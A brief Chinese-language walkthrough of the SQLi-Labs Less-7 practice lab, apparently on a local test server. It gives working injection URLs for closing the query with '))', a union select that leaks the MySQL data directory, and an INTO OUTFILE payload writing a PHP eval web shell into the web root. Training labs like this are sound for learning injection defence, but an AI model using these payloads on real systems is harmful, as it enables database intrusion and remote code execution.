判断注入
这里可以看出是字符型注入
http://1.1.1.130:86/Less-7/index.php?id=1%27%20and%20%271%27=%271
去源码里看一下,原来是加了两个括号
测试注入,这里提示导出文件:
http://1.1.1.130:86/Less-7/index.php?id=1%27))%23
爆绝对路径
这里因为不知道具体的绝对路径,所以返回第一关去看一下
http://1.1.1.130:86/Less-1/?id=-1%27%20union%20select%20null,@@datadir,@@basedir%20%23
开始注入
这就写入完毕了,这里被火绒杀了,就不连接了
http://1.1.1.130:86/Less-7/index.php?id=1%27))%20union%20select%20null,null,%27%3C?php%20@eval($_POST[123]);?%3E%27%20into%20outfile%20%22C:\inetpub\target\sqlilabs\Less-7\shell.php%22%20%23